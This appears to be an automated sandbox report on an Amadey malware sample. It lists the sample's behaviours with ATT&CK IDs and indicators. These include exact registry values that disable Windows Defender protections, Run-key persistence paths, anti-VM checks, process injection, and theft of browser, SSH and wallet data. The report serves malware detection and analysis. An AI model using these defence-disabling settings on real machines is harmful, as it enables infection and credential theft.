amadey | 75b96cd2edcfa2f357238e3a1517607cea86a80b5298b0d9a018eb906820d26e

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	6089caffb3.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	6089caffb3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	6089caffb3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	6089caffb3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	6089caffb3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	6089caffb3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	6089caffb3.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	6089caffb3.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	6089caffb3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	6089caffb3.exe

Modifies security service 2 TTPs 2 IoCs

Modify Registry

Windows Service

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/1016-127-0x00000000082D0000-0x0000000008424000-memory.dmp	family_quasar
behavioral1/memory/1016-128-0x0000000008460000-0x000000000847A000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3500 created 2268	3500	MSBuild.exe	50

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	bf63e36e97.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1Uk2RJcLqabN.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6089caffb3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	81bb507991.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	772224823d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Chel3raiO6Ri.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	250ab1997b.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
17	5984	powershell.exe
34	1016	powershell.exe
36	1016	powershell.exe
39	1016	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5408	powershell.exe
2360	powershell.exe
1324	powershell.exe
2260	powershell.exe
5984	powershell.exe
1016	powershell.exe
7608	powershell.exe
1656	powershell.exe
432	powershell.exe
5316	powershell.exe
5728	powershell.exe
9636	powershell.exe
5360	powershell.exe
5736	powershell.exe
12996	powershell.exe
8436	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 18 IoCs

flow	pid	Process
43	1060	rapes.exe
31	1060	rapes.exe
297	1060	rapes.exe
400	1060	rapes.exe
167	1060	rapes.exe
167	1060	rapes.exe
167	1060	rapes.exe
167	1060	rapes.exe
167	1060	rapes.exe
167	1060	rapes.exe
167	1060	rapes.exe
208	748	d8bc43181b.exe
299	856	svchost.exe
300	3112	svchost015.exe
393	2884	svchost015.exe
17	5984	powershell.exe
303	1060	rapes.exe
332	1060	rapes.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
5464	netsh.exe

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
1608	takeown.exe
5028	takeown.exe
4768	icacls.exe
5380	icacls.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

credential_access stealer

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\W6sW08_6744\ImagePath = "\\??\\C:\\Windows\\Temp\\W6sW08_6744.sys"	tzutil.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 7 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
5024	chrome.exe
3460	chrome.exe
1944	msedge.exe
3628	msedge.exe
4820	msedge.exe
1352	chrome.exe
3060	chrome.exe

Checks BIOS information in registry 2 TTPs 26 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	81bb507991.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	772224823d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	250ab1997b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d8bc43181b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Chel3raiO6Ri.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1Uk2RJcLqabN.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6089caffb3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bf63e36e97.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	772224823d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d8bc43181b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1Uk2RJcLqabN.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6089caffb3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	81bb507991.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	250ab1997b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bf63e36e97.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Chel3raiO6Ri.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	d8bc43181b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	apple.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Deletes itself 1 IoCs

pid	Process
6420	w32tm.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e9640c9d.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a53423a4.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a53423a4.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e9640c9d.cmd	powershell.exe

Executes dropped EXE 29 IoCs

pid	Process
4948	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE
1060	rapes.exe
2944	rapes.exe
2716	captcha.exe
396	apple.exe
4464	261.exe
4708	261.exe
2412	261.exe
1880	261.exe
5284	772224823d.exe
3112	svchost015.exe
3980	rapes.exe
4912	250ab1997b.exe
2884	svchost015.exe
5424	bf63e36e97.exe
748	d8bc43181b.exe
5444	Chel3raiO6Ri.exe
6132	8726cdeb67.exe
1752	1Uk2RJcLqabN.exe
2844	6089caffb3.exe
4572	YGYZCmt.exe
4532	Rm3cVPI.exe
5948	p3hx1_003.exe
6188	qWR3lUj.exe
6744	tzutil.exe
6420	w32tm.exe
2528	TbV75ZR.exe
8060	rapes.exe
10508	81bb507991.exe

Identifies Wine through registry keys 2 TTPs 12 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	772224823d.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	bf63e36e97.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	1Uk2RJcLqabN.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	6089caffb3.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	81bb507991.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	250ab1997b.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	Chel3raiO6Ri.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1608	takeown.exe
5028	takeown.exe
4768	icacls.exe
5380	icacls.exe

Reads ssh keys stored on the system 2 TTPs
Tries to access SSH used by SSH programs.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	6089caffb3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	6089caffb3.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6089caffb3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10413400101\\6089caffb3.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf63e36e97.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10413370101\\bf63e36e97.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d8bc43181b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10413380101\\d8bc43181b.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8726cdeb67.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10413390101\\8726cdeb67.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Documents\desktop.ini	firefox.exe
File opened for modification	C:\Users\Public\desktop.ini	firefox.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	firefox.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	captcha.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0002000000023282-1380.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 25 IoCs

discovery

Process Discovery

T1057

pid	Process
10568	tasklist.exe
4524	tasklist.exe
3664	tasklist.exe
5576	tasklist.exe
740	tasklist.exe
4724	tasklist.exe
10184	tasklist.exe
4744	tasklist.exe
1952	tasklist.exe
4460	tasklist.exe
1156	tasklist.exe
2528	tasklist.exe
4508	tasklist.exe
10412	tasklist.exe
4952	tasklist.exe
740	tasklist.exe
5336	tasklist.exe
6016	tasklist.exe
3820	tasklist.exe
10072	tasklist.exe
10172	tasklist.exe
1956	tasklist.exe
6096	tasklist.exe
3608	tasklist.exe
3856	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

pid	Process
4948	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE
1060	rapes.exe
2944	rapes.exe
5284	772224823d.exe
3980	rapes.exe
4912	250ab1997b.exe
5424	bf63e36e97.exe
5444	Chel3raiO6Ri.exe
1752	1Uk2RJcLqabN.exe
2844	6089caffb3.exe
8060	rapes.exe
10508	81bb507991.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 5284 set thread context of 3112	5284	772224823d.exe	500
PID 4912 set thread context of 2884	4912	250ab1997b.exe	536
PID 4572 set thread context of 100	4572	YGYZCmt.exe	566
PID 6188 set thread context of 6516	6188	qWR3lUj.exe	578
PID 2528 set thread context of 3500	2528	TbV75ZR.exe	585

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempXUWOVZASFR2G7HWIBFVW1P2CM0LUTOLD.EXE

Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

persistence privilege_escalation

Ignore Process Interrupts

T1564.011

pid	Process
432	powershell.exe
5728	powershell.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1696	sc.exe
4548	sc.exe
1840	sc.exe
3500	sc.exe
2564	sc.exe
2160	sc.exe
4596	sc.exe
880	sc.exe
2068	sc.exe
3640	sc.exe
1440	sc.exe
1920	sc.exe
1980	sc.exe
4776	sc.exe
4064	sc.exe
3864	sc.exe
2152	sc.exe
4576	sc.exe
1020	sc.exe
5140	sc.exe
1248	sc.exe
868	sc.exe
744	sc.exe
1460	sc.exe
2844	sc.exe
1932	sc.exe
4428	sc.exe
2384	sc.exe
4056	sc.exe
5832	sc.exe
5336	sc.exe
3728	sc.exe
4308	sc.exe
4268	sc.exe
2176	sc.exe
4716	sc.exe
4812	sc.exe
3068	sc.exe
4380	sc.exe
404	sc.exe
5192	sc.exe
4604	sc.exe
4980	sc.exe
432	sc.exe
5380	sc.exe
2952	sc.exe
4724	sc.exe
1752	sc.exe
4708	sc.exe
5780	sc.exe
2108	sc.exe
4816	sc.exe
3940	sc.exe
4692	sc.exe
4264	sc.exe
1156	sc.exe
4744	sc.exe
5976	sc.exe
3460	sc.exe
2756	sc.exe
3976	sc.exe
5176	sc.exe
2040	sc.exe
4264	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
7404	3500	WerFault.exe	585

System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1Uk2RJcLqabN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
